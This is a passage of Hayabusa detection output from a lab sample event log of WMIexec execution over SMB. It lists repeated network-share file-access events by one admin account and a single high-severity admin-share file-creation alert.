Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.240 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.256 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.257 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.108 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.108 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.108 +00:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 